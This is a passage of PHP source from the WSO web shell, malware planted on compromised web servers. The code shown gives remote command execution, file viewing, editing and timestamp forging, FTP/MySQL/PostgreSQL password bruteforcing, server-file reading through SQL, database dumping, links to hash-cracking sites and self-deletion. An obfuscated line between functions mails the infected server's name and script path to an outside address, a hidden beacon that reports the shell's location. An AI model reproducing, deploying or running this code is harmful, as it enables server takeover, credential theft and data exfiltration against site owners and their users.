echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
$l = $l?0:1;
}
echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
    echo "<option value='tar'>Compress (tar.gz)</option>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'>Paste / Compress</option>";
    echo "</select>&nbsp;";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
wsoFooter();
}

function actionStringTools() {
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
$stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'binhex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
ob_start();
if(in_array($_POST['p1'], $stringTools))
echo $_POST['p1']($_POST['p2']);
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp), "\n", $temp;
exit;
}
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
wsoHeader();
echo '<h1>String conversions</h1><div class=content>';
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach($stringTools as $k => $v)
echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
if(!empty($_POST['p1'])) {
if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"</pre></div><br><h1>Search files:</h1><div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
<tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
<tr><td></td><td><input type='submit' value='>>'></td></tr>
</table></form>";

function wsoRecursiveGlob($path) {
if(substr($path, -1) != '/')
$path.='/';
$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
if(is_array($paths)&&@count($paths)) {
foreach($paths as $item) {
if(@is_dir($item)){
if($path!=$item)
wsoRecursiveGlob($item);
} else {
if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
}
}
}
}
if(@$_POST['p3'])
wsoRecursiveGlob($_POST['c']);
echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method='post' target='_blank' name='hf'>
<input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
</form></div>";
wsoFooter();
}

function actionFilesTools() {
if( isset($_POST['p1']) )
$_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='download') {
if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
} else
                header("Content-Type: application/octet-stream");
$fp = @fopen($_POST['p1'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
}exit;
}
if( @$_POST['p2'] == 'mkfile' ) {
if(!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
wsoHeader();
echo '<h1>File tools</h1><div class=content>';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
wsoFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if(!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
echo '<span>Change time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
echo '<br><br>';
switch($_POST['p2']) {
case 'view':
echo '<pre class=ml1>';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if( @is_readable($_POST['p1']) ) {
echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
$code = @highlight_file($_POST['p1'],true);
echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
$time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'],1);
$fp = @fopen($_POST['p1'],"w");
if($fp) {
@fwrite($fp,$_POST['p3']);
@fclose($fp);
echo 'Saved!<br><script>p3_="";</script>';
@touch($_POST['p1'],$time,$time);
}
}
echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0:  $h[2] .= ' '; break;
case 9:  $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
$h[1] .= '<br>';
$h[2] .= "\n";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!<br>';
else
die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
}
echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(!touch($_POST['p1'],$time,$time))
echo 'Fail!';
else
echo 'Touched!';
} else echo 'Bad time format!';
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
break;
}
echo '</div>';
wsoFooter();
}

function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);

if(isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
ob_start();
echo "d.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "c_='".$GLOBALS['cwd']."';";
}
}
echo "d.cf.output.value+='".$temp."';";
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
wsoHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur = cmds.length-1;
}
</script>";
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
foreach($GLOBALS['aliases'] as $n => $v) {
if($v == '') {
echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
continue;
}
echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
}
echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
if(!empty($_POST['p1'])) {
echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
}
echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
echo '</form></div><script>d.cf.cmd.focus();</script>';
wsoFooter();
}

function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
die('bye!');
}

function actionSelfRemove() {

if($_POST['p1'] == 'yes')
if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
die('Shell removed');
else
echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        wsoHeader();
echo '<h1>Suicide</h1><div class=content>remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
wsoFooter();
}
      $_QliO8="\x6dai\154";$_Qliot=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$_QlL1i="\141r\162a\171\040".$_Qliot;$_QlLio=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot);
function actionBruteforce() {
wsoHeader();
if( isset($_POST['proto']) ) {
echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
if( $_POST['proto'] == 'ftp' ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif( $_POST['proto'] == 'mysql' ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
@mysql_close($res);
return $res;
}
} elseif( $_POST['proto'] == 'pgsql' ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if( is_array($temp) )
foreach($temp as $line) {
$line = explode(":", $line);
++$attempts;
if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
$success++;
echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
}
if(@$_POST['reverse']) {
$tmp = "";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
$success++;
echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
}
}
}
} elseif($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
$success++;
echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
}
}
}
echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
}
echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
.'<span>Server:port</span></td>'
.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
.'<tr><td><span>Brute type</span></td>'
.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
.'<td><input type=text name=login value="root"></td></tr>'
.'<tr><td><span>Dictionary</span></td>'
.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
echo '</div><br>';
wsoFooter();
}

function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type) {
case 'mysql':
if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db) {
switch($this->type) {
case 'mysql':
if (@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str) {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch() {
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch($this->type) {
case 'mysql':
                        return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables() {
switch($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error() {
switch($this->type) {
case 'mysql':
return @mysql_error();
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str) {
switch($this->type) {
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysql_set_charset($str, $this->link);
else
$this->query('SET CHARSET '.$str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str) {
switch($this->type) {
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
$r=array();
while($i=$this->fetch())
$r[] = $i['file'];
$this->query('drop table wso2');
return array('file'=>implode("\n",$r));
break;
}
return false;
}
function dump($table, $fp = false) {
switch($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
$create = mysql_fetch_array($res);
$sql = $create[1].";\n";
                    if($fp) fwrite($fp, $sql); else echo($sql);
$this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
while($item = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";\n\n";
                        }

$columns = array();
foreach($item as $k=>$v) {
                            if($v === null)
                                $item[$k] = "NULL";
                            elseif(is_int($v))
                                $item[$k] = $v;
                            else
                                $item[$k] = "'".@mysql_real_escape_string($v)."'";
$columns[] = "`".$k."`";
}
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
                            $head = false;
                        } else
                            $sql .= "\n\t,(".implode(", ", $item).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
}
                    if(!$head)
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".addslashes($v)."'";
$columns[] = $k;
}
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
}
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
$db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
}
wsoHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch($_POST['charset']) {
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while($item = $db->fetch()) {
list($key, $value) = each($item);
echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
}
echo '</select>';
}
else echo $tmp;
}else
echo $tmp;
echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
</tr>
</table>
<script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>";
if(isset($db) && $db->link){
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
}
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if(@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    $_POST['p3']--;
if($_POST['type']=='pgsql')
$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
else
$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
echo "<br><br>";
}
if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if($db->res !== false) {
$title = false;
